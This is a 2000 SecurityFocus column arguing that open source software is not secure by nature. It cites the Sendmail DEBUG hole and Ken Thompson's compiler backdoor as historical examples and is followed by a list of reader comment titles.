Digg this story   Add to del.icio.us  
Wide Open Source
Elias Levy, SecurityFocus 2000-04-17

Is Open Source really more secure than closed? Elias Levy says there's a little security in obscurity.

One of the great rallying cries from the Open Source community is the assertion that Open Source Software (OSS) is, by its very nature, less likely to contain security vulnerabilities, including back doors, than closed source software. The reality is far more complex and nuanced.

Advocates derive their dogmatic faith in the implicit security of Open Source code from the concept of "peer review," a cornerstone of the scientific process in which published papers and theories are scrutinized by experts other than the authors. The more peers that review the work, the less likely it is that it will contains errors, and the more likely it is to become accepted.

Open Source apostles believe that releasing the source code for a piece of software subjects it to the same kind of peer review as a quantum physics theory published in a scientific journal. Other programmers, the theory goes, will review the code for security vulnerabilities, reveal and fix them, and thus the number of new vulnerabilities introduced and discovered in the software will decrease over time when compared to similar closed source software.

It's a nice theory, and in the ideal Open Source world, it would even be true. But in the real world, there are a variety of factors that effect how secure Open Source Software really is.

Sure, the source code is available. But is anyone reading it?

If Open Source were the panacea some think it is, then every security hole described, fixed and announced to the public would come from people analyzing the source code for security vulnerabilities, such as the folks at OpenBSD, the Linux Auditing Project, or the developers or users of the application.

But there have been plenty of security vulnerabilities in Open Source Software that were discovered, not by peer review, but by black hats. Some security holes aren't discovered by the good guys until an attacker's tools are found on a compromised site, network traffic captured during an intrusion turns up signs of the exploit, or knowledge of the bug finally bubbles up from the underground.

Why is this? When the security company Trusted Information Systems (TIS) began making the source code of their Gauntlet firewall available to their customers many years ago, they believed that their clients would check for themselves how secure the product was. What they found instead was that very few people outside of TIS ever sent in feedback, bug reports or vulnerabilities. Nobody, it seems, is reading the source.

The fact is, most open source users run the software, but don't personally read the code. They just assume that someone else will do the auditing for them, and too often, it's the bad guys.

Even if people are reviewing the code, that doesn't mean they're qualified to do so.

In the scientific world, peer review works because the people doing the reviewing possess a comparable, or higher, technical caliber and level of authority on the subject matter than the author.

It is generally true that the more people reviewing a piece of code, the less likely it is the code will have a security flaw. But a single well-trained reviewer who understands security and what the code is trying to accomplish will be more effective than a hundred people who just recently learned how to program.

It is easy to hide vulnerabilities in complex, little understood and undocumented source code.

Old versions of the Sendmail mail transport agent implemented a DEBUG SMTP command that allowed the connecting user to specify a set of commands instead of an email address to receive the message. This was one of the vulnerabilities exploited by the notorious Morris Internet worm.

Sendmail is one of the oldest examples of open source software, yet this vulnerability, and many others, lay unfixed a long time. For years Sendmail was plagued by security problems, because this monolithic programs was very large, complicated, and little understood but for a few.

Vulnerabilities can be a lot more subtle than the Sendmail DEBUG command. How many people really understand the ins and outs of a kernel based NFS server? Are we sure its not leaking file handles in some instances? Ssh 1.2.27 is over seventy-one thousand lines of code (client and server). Are we sure a subtle flaw does not weakening its key strength to only 40-bits?

There is no strong guarantee that source code and binaries of an application have any real relationship.

All the benefits of source code peer review are irrelevant if you can not be certain that a given binary application is the result of the reviewed source code.

Ken Thompson made this very clear during his 1983 Turing Award lecture to the ACM, in which he revealed a shocking, and subtle, software subversion technique that's still illustrative seventeen years later.

Thompson modified the UNIX C compiler to recognize when the login program was being compiled, and to insert a back door in the resulting binary code such that it would allow him to login as any user using a "magic" password.

Anyone reviewing the compiler source code could have found the back door, except that Thompson then modified the compiler so that whenever it compiled itself, it would insert both the code that inserts the login back door, as well as code that modifies the compiler. With this new binary he removed the modifications he had made and recompiled again.

He now had a trojaned compiler and clean source code. Anyone using his compiler to compile either the login program , or the compiler, would propagate his back doors.

The reason his attack worked is because the compiler has a bootstrapping problem. You need a compiler to compile the compiler. You must obtain a binary copy of the compiler before you can use it to translate the compiler source code into a binary. There was no guarantee that the binary compiler you were using was really related to the source code of the same.

Most applications do not have this bootstrapping problem. But how many users of open source software compile all of their applications from source?

A great number of open source users install precompiled software distributions such as those from RedHat or Debian from CD-ROMs or FTP sites without thinking twice whether the binary applications have any real relationship to their source code.

While some of the binaries are cryptographically signed to verify the identity of the packager, they make no other guarantees. Until the day comes when a trusted distributor of binary open source software can issue a strong cryptographic guarantee that a particular binary is the result of a given source, any security expectations one may have about the source can't be transferred to the binary.

Open Source makes it easy for the bad guys to find vulnerabilities.

Whatever potential Open Source has to make it easy for the good guys to proactively find security vulnerabilities, also goes to the bad guys.

It is true that a black hat can find vulnerabilities in a binary-only application, and that they can attempt to steal the source code to the application from its closed source. But in the same amount of time they can do that, they can audit ten different open source applications for vulnerabilities. A bad guy that can operate a hex editor can probably manage to grep source code for 'strcpy'.

Security through obscurity is not something you should depend on, but it can be an effective deterrent if the attacker can find an easier target.

So does all this mean Open Source Software is no better than closed source software when it comes to security vulnerabilities? No. Open Source Software certainly does have the potential to be more secure than its closed source counterpart.

But make no mistake, simply being open source is no guarantee of security.

    Digg this story   Add to del.icio.us  
Comments Mode:
Netscape developers are weenies! 2000-04-17
Anonymous (2 replies)
Netscape developers are weenies! 2000-04-17
Anonymous (1 replies)
haha... 2000-04-18
Anonymous
Ever hear of SourceSafe? 2000-04-17
Anonymous (3 replies)
MS vs. Linux 2000-04-17
Anonymous (1 replies)
Like most MS products 2000-04-17
Anonymous
MS has SourceSafe (hehe) 2000-04-17
Anonymous
SourceSafe Rocks 2000-04-17
Anonymous
Please emphasize your conclusion 2000-04-17
Anonymous
Bug *fixes*...? 2000-04-17
Anonymous (2 replies)
Re: bug fixes 2000-04-17
David Terrell <dbt (at) meat (dot) net [email concealed]> (2 replies)
What? 2000-04-17
Anonymous
a bit reactionary, eh? 2000-04-18
Anonymous (1 replies)
potentialities and realities 2000-04-18
David Terrell <dbt (at) meat (dot) net [email concealed]>
Latest MS bug fixed same day 2000-04-18
Anonymous (1 replies)
Good response, MS 2000-04-19
Anonymous
Wide Open Source 2000-04-17
Anonymous
Open Source Security 2000-04-17
Anonymous
You forgot one thing: 2000-04-17
Anonymous
But you ignore the obvious 2000-04-17
Anonymous
Auditing of compiled code not much harder ... 2000-04-17
Anonymous (1 replies)
Forget about strcpy() 2000-04-17
Anonymous
good analysis... 2000-04-17
Anonymous
Examine the record... 2000-04-17
Anonymous (1 replies)
Comparing Apache and IIS is wrong 2000-04-17
Anonymous (2 replies)
crap load along with Apache. 2000-04-17
Anonymous
Path of the weak 2000-04-17
Anonymous
You've made several critical mistakes in your comment. 2000-04-17
Bruce Perens <bruce (at) perens (dot) com [email concealed]> (3 replies)
Sorry about the bad formatting. 2000-04-17
Bruce Perens <bruce (at) perens (dot) com [email concealed]>
Re: Bruce Parens' Defense of Open Source 2000-04-17
David Terrell <dbt (at) meat (dot) net [email concealed]> (2 replies)
How to respond to past reports of vulnerability 2000-04-17
Bruce Perens <bruce (at) perens (dot) com [email concealed]> (1 replies)
Re: How to respond to past reports of vulnerability 2000-04-18
David Terrell <dbt (at) meat (dot) net [email concealed]> (1 replies)
I don't think you get what he's talking about, Dave... 2000-04-19
Barry Fitzgerald <reaperx1 (at) netscape (dot) net [email concealed]> (1 replies)
Indeed there are a lot of bugs 2000-04-18
Anonymous
Thanks for the additional info but... 2000-04-17
Anonymous (1 replies)
Trust-worthyness and ability to spot bugs 2000-04-17
Bruce Perens <bruce (at) perens (dot) com [email concealed]>
Skill is always at a premium 2000-04-17
Christopher Petrilli <petrilli (at) amber (dot) org [email concealed]> (1 replies)
Rigorous methodology 2000-04-17
Anonymous
Blackhat? 2000-04-17
batz <batsy (at) vapour (dot) net [email concealed]> (1 replies)
semantics 2000-04-17
Ryan Russell <ryan (at) securityfocus (dot) com [email concealed]>
Some good points... 2000-04-17
Anonymous
Open source as a democracy 2000-04-17
Anonymous (1 replies)
Politics are irrelevant 2000-04-17
Anonymous
This isn't OSS vs. CSS 2000-04-17
Anonymous
bugs? yeah. fixes? right away 2000-04-17
Anonymous
Apples and Oranges 2000-04-17
Anonymous (2 replies)
re: Apples and Oranges 2000-04-17
Anonymous
NSA/Linux 2000-04-20
Anonymous
Blackhat, whitehat, whatever. 2000-04-17
Anonymous
Who found the sendmail bug? 2000-04-17
Brett <disfunct (at) radiusnet (dot) net [email concealed]> (1 replies)
Morris didn't find the Sendmail bug 2000-04-20
Rick Smith <rick_smith (at) securecomputing (dot) com [email concealed]>
to expand on what i said earlier. 2000-04-17
Brett <disfunct (at) radiusnet (dot) net [email concealed]>
Attitudes 2000-04-17
Anonymous
Rates of evolution 2000-04-17
Anonymous
just a few little things... 2000-04-17
Anonymous
a quick Summary and rant 2000-04-17
Anonymous
OSS vs closed 2000-04-17
Anonymous
Banks, The NSA, and US companies. 2000-04-18
Anonymous
Open source? Use real examples! 2000-04-18
Anonymous
Come on 2000-04-18
Anonymous
Correct the facts and the conclusions stand strong 2000-04-21
Rick Smith <rick_smith (at) securecomputing (dot) com [email concealed]>
Original Bugtraq mailing list description? 2000-04-21
Robert Quinn <rquinn (at) pobox (dot) com [email concealed]>


 

Privacy Statement
Copyright 2010, SecurityFocus